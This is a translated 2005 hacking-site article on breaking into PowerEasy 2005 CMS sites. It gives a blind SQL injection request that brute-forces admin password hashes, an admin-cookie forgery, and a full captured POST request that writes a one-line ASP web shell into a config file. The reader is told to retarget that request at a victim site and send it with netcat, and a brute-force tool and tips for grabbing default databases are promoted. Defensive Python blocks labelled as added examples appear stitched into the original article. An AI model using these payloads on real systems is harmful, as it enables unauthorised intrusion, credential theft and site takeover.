PowerEasy (动易) 2005 upload vulnerability - vulnerability warning - Black Bar Security Net

2005-12-29 00:00:00
Anonymous (佚名)
www.myhack58.com
MYHACK58:6220055896
I have not written an article for a long time. This one mainly explains two techniques: a clever injection, and uploading a WebShell without entering the backend at all. I hope friends can draw inferences from it; where it is inappropriate, please let the masters correct me.
1. Injection vulnerability
A friend asked me to look at a site for him. It was running the PowerEasy 2005 Access edition. Earlier, LLIKZ and I found that the SQL Server edition of PowerEasy has an injection vulnerability in the short message (private message) function; because SQL Server can execute multiple statements, exploiting it there is relatively easy. The Access edition has the same vulnerability, but it has to be guessed by hand, which is more trouble, so it was left alone. This site was exploitable at the same place, the short message function, except that it is the Access version. First register a user and log in. If there is no short message function in the user control panel, try entering <http://www.***.com/user/user_message.asp> in the URL. Send yourself a short message and then delete it; if you append a semicolon to the message number when deleting, MessageID=1;, the system returns "Syntax error in query expression 'Incept='admin' and ID in (4;)'." This indicates an injection vulnerability. As shown below:

[screenshot]

Why the error message? Look carefully at the SQL: what follows `in` should be a set, but the semicolon after the 4 causes a syntax error. Testing showed that the page only returns an error when there is a syntax error, so how can this single error be used to achieve injection? The answer is the iif statement. The constructed request is: /User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=1)and%201=(select%20top%201%20iif(asc(mid(password,1,1))<96,1,password)%20from%20pe_admin. Let's analyze why it is built this way. From the error message, the message number is followed by a right parenthesis, so to complete the condition the injected statement puts a right parenthesis directly after MessageID=1; no right parenthesis is added after the table name pe_admin because it borrows the one already present in the conditional statement. Now the key expression, iif(asc(mid(password,1,1))<96,1,password): asc(mid(password,1,1))<96 tests whether the ASCII value of the first character of the password field is less than 96, so the whole iif returns 1 if it is, and returns password otherwise. If it returns 1, the select returns 1, the condition 1=1 is true, and the page shown below appears:

[screenshot]

Conversely, if the ASCII value of the first character of the password field is not less than 96, the value of the password field is returned, the condition becomes 1=<password value>, and the following prompt appears: "Data type mismatch in criteria expression."

[screenshot]

So the different responses can be used to brute-force the value.
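Two defensive pieces for the MessageID injection described above, as an added example that is not PowerEasy's own code: the strict validator a fixed User_Message.asp would apply before building the `ID in (...)` clause, and a scanner that flags the iif/asc/mid probe in IIS-style log lines (the log lines are constructed for the example).

```python
import re
from urllib.parse import unquote_plus

# Added example, not PowerEasy's code: a validator that would reject the
# probe before it reaches "ID in (...)", plus a log scanner that reports
# requests whose MessageID fails that validation (sample log is constructed).

ID_LIST = re.compile(r"\d+(?:,\d+)*")

def parse_message_ids(raw):
    """Accept only a comma-separated list of integers; a trailing ';' or ')and 1=(select ...' yields None."""
    raw = raw.strip()
    if not ID_LIST.fullmatch(raw):
        return None
    return [int(x) for x in raw.split(",")]

# Jet/Access tokens the blind probe depends on, matched after URL decoding.
PROBE = re.compile(r"iif\s*\(|asc\s*\(|mid\s*\(|select\s+top|\)\s*and\b", re.I)

def message_id_param(query):
    """Extract the raw MessageID value: split only on '&' (so ';' survives) and on the first '=' (so '1=(' survives)."""
    for pair in unquote_plus(query).split("&"):
        key, _, value = pair.partition("=")
        if key == "MessageID":
            return value
    return ""

def scan_log(text):
    """Return (line_no, reason) for each User_Message.asp request whose MessageID fails validation."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split(" ", 4)  # date time uri-stem uri-query status
        if len(fields) < 5 or not fields[2].lower().endswith("user_message.asp"):
            continue
        value = message_id_param(fields[3])
        if parse_message_ids(value) is not None:
            continue
        tokens = sorted({re.sub(r"\s+", " ", t.lower()) for t in PROBE.findall(value)})
        hits.append((n, "probe:" + ",".join(tokens) if tokens else "malformed MessageID"))
    return hits

# Constructed sample log: a normal delete, the ';' syntax-error test, and the iif() oracle request.
SAMPLE_LOG = """\
2005-12-29 00:01:02 /User/User_Message.asp Action=Del&ManageType=Inbox&MessageID=4 200
2005-12-29 00:01:09 /User/User_Message.asp Action=Del&ManageType=Inbox&MessageID=1; 500
2005-12-29 00:01:15 /User/User_Message.asp Action=Del&ManageType=Inbox&MessageID=1)and%201=(select%20top%201%20iif(asc(mid(password,1,1))<96,1,password)%20from%20pe_admin 200
"""
```

Running `scan_log(SAMPLE_LOG)` reports line 2 as a malformed MessageID and line 3 with the probe tokens it contains; line 1 passes validation and is not reported.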
2. Upload vulnerability
With injection covered, let's talk about how to upload without entering the backend. Here is an upload idea for you: upload by cookie spoofing. Look at the file behind "top menu management", Admin_RootClass_Menu.asp. It includes the following header files:
' Database connection file
' Function definitions file
' Administrative permission check file
' Top menu settings file
After the administrator check passes, the parameters we set are written into the file RootClass_Menu_Config.asp. So what about bypassing Admin_ChkPurview.asp? Look at this code in it:
' Check whether the administrator is logged in
AdminName = ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("AdminName")))         ' administrator name
AdminPassword = ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("AdminPassword"))) ' administrator's MD5 password
RndPassword = ReplaceBadChar(Trim(Request.Cookies(Site_Sn)("RndPassword")))     ' administrator's random password
The program decides whether the visitor is an administrator from these three variables, and all three are taken from cookies, so we can capture a cookie and spoof it.
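The check above accepts whoever presents AdminName, AdminPassword and RndPassword in a cookie, and all three can be read out of the database. As an added example that is not PowerEasy's code, this sketch binds the admin cookie to a server-side secret that lives outside the database (assumed here to be loaded from a file outside the web root) and to an expiry time, so database contents alone are not enough to forge it.

```python
import hmac
import hashlib

# Added example, not PowerEasy's code. Cookie format: name|expiry|HMAC-SHA256(secret, name|expiry).
# SERVER_SECRET is a constructed placeholder; the assumption is that a real
# deployment loads it from a file outside the web root, never from the database.
SERVER_SECRET = b"constructed-placeholder-secret"

def _tag(admin_name, expires):
    msg = f"{admin_name}|{expires}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()

def issue_admin_cookie(admin_name, now, ttl=1800):
    """Issue a cookie value for a logged-in administrator, valid for ttl seconds."""
    if "|" in admin_name:
        raise ValueError("admin name must not contain the field separator")
    expires = int(now) + ttl
    return f"{admin_name}|{expires}|{_tag(admin_name, expires)}"

def verify_admin_cookie(cookie, now):
    """Return the admin name if the cookie is authentic and unexpired, else None.
    Legacy values such as 'AdminName=admin&RndPassword=...' fail the format check."""
    parts = cookie.split("|")
    if len(parts) != 3 or not parts[1].isdigit():
        return None
    admin_name, expires, tag = parts[0], int(parts[1]), parts[2]
    if not hmac.compare_digest(_tag(admin_name, expires), tag):  # constant-time compare
        return None
    if int(now) >= expires:
        return None
    return admin_name
```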
The specific method: first install the system on your own machine, log in to the backend, click top menu management, and in the "menu background image" field enter the following code:
"%><%'
(the full field value, including what sits between the two delimiters, appears URL-encoded as RCM_Menu_18 in the capture). Then capture the packet, which looks like this:
POST /admin/Admin_RootClass_Menu.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
Referer: http://178.126.0.234/admin/Admin_RootClass_Menu.asp?ChannelID=1
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: 178.126.0.234
Content-Length: 1009
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQCSBQACQ=IFFFGAKDHJPAJJCCDGOKMOEN; SendMessage=Yes; 1781260234=AdminName=admin&RndPassword=5748509MMHo36NDH&AdminPassword=469e80d32c0559f8&CookieDate=1; VisitNum=1

RCM_Menu_1=4&RCM_Menu_2=0&RCM_Menu_3=0&RCM_Menu_4=2&RCM_Menu_5=3&RCM_Menu_6=6&RCM_Menu_7=7&RCM_Menu_8=100&RCM_Menu_9=filter%3AGlow%28Color%3D%23000000%2C+Strength%3D3%29&RCM_Menu_10=4&RCM_Menu_12=23&RCM_Menu_13=50&RCM_Menu_14=2&RCM_Menu_15=4&RCM_Menu_16=%23999999&RCM_Menu_17=%23ffffff&RCM_Menu_18=%22%25%3E%3CSCRIPT+RUNAT%3DSERVER+LANGUAGE%3DJAVASCRIPT%3Eeval%28Request.form%28%27yongger%27%29%2B%27%27%29%3C%2FSCRIPT%3E%3C%25%27&RCM_Menu_19=3&RCM_Menu_20=1&RCM_Menu_21=1&RCM_Menu_22=%23ACA899&RCM_Item_12=&RCM_Item_13=&RCM_Item_14=0&RCM_Item_15=0&RCM_Item_16=0&RCM_Item_17=&RCM_Item_18=&RCM_Item_19=0&RCM_Item_20=0&RCM_Item_21=0&RCM_Item_22=0&RCM_Item_23=1&RCM_Item_24=%23F1F2EE&RCM_Item_25=1&RCM_Item_26=%23CCCCCC&RCM_Item_27=1&RCM_Item_28=&RCM_Item_29=&RCM_Item_30=3&RCM_Item_32=0&RCM_Item_33=0&RCM_Item_34=%23FFFFF7&RCM_Item_35=%23FF0000&RCM_Item_36=%23000000&RCM_Item_37=%23CC0000&RCM_Item_38=9pt+%CB%CE%CC%E5&RCM_Item_39=9pt+%CB%CE%CC%E5&Action=SaveConfig&ChannelID=1&cmdSave=+%B1%A3%B4%E6%C9%E8%D6%C3+
Modify the captured content: change the host in Referer: http://178.126.0.234/admin/Admin_RootClass_Menu.asp?ChannelID=1 and in Host: 178.126.0.234 to the target host name. In 1781260234=AdminName=admin&RndPassword=5748509MMHo36NDH&AdminPassword=469e80d32c0559f8, replace the AdminName, RndPassword and AdminPassword values with the target site's, and replace the string 1781260234 with the target site's URL with the dots removed. Some friends may notice that 1781260234 happens to be my IP address with the dots removed; if the target address is www.abc.com, it becomes wwwabccom. After the changes, submit the request with NC (netcat). After a successful submission the content of RootClass_Menu_Config.asp is as shown below:
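Why the write into RootClass_Menu_Config.asp is exploitable, and how a writer would have to escape it, as an added example that is not PowerEasy's code: it reproduces the shape of the config write described above and shows that doubling quotes alone is not enough, because classic ASP closes a `<% ... %>` block at the first `%>` even inside a VBScript string literal. The breakout value used below is constructed; the better fix is to store such settings as data rather than as code.

```python
# Added example, not PowerEasy's code: the vulnerable shape of the config
# write beside a hardened writer, with a check that the generated file is
# still a single server-side block.

def render_config_as_written(values):
    """Vulnerable shape: each form value is dropped straight into a VBScript
    string literal, so a value starting with '"%>' ends the block early."""
    body = "\n".join(f'{name} = "{value}"' for name, value in values.items())
    return f"<%\n{body}\n%>"

def vbs_literal(value):
    """Escape for a VBScript double-quoted literal and neutralise ASP delimiters:
    quotes are doubled, '%>' and '<%' are split across concatenated strings."""
    value = value.replace('"', '""')
    value = value.replace("%>", '%" & ">')
    value = value.replace("<%", '<" & "%')
    return f'"{value}"'

def render_config_hardened(values):
    body = "\n".join(f"{name} = {vbs_literal(v)}" for name, v in values.items())
    return f"<%\n{body}\n%>"

def asp_blocks(text):
    """Count <% ... %> blocks the way the ASP engine delimits them: a block ends
    at the first '%>' after its start, regardless of string context."""
    count, i = 0, 0
    while (start := text.find("<%", i)) >= 0:
        count += 1
        end = text.find("%>", start + 2)
        if end < 0:
            break
        i = end + 2
    return count

def safe_to_write(rendered):
    """A generated config file must still be exactly one server-side block."""
    return asp_blocks(rendered) == 1

# Constructed value with the breakout shape seen in the capture above
# (a closing quote and '%>', then content, then '<%' and a comment mark).
BREAKOUT = '"%>injected<%\''
```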

[screenshot]

3. PowerEasy upload vulnerability, Hacker Defense special edition
For the convenience of friends, a program has been compiled. If the target has the injection vulnerability, first register a user, save the cookies and send yourself a short message; then click Start and it can brute-force RndPassword and Password. The program does not brute-force the administrator user name; the user fills it in. Then click Upload; if the dialog box "upload successful" appears, you can use the Ice Fox one-line backdoor. As it progresses, the information returned by the site is displayed in the blank box below.

[screenshot]

Tips: many sites use the default database <http://www.***.com/database/powereasy5.mdb>; download it directly, then fill in RndPassword, Password and the administrator name, and you can upload the backdoor.
Disclaimer: the negative consequences of using this program are borne by the user; the author and Hacker Defense bear no responsibility!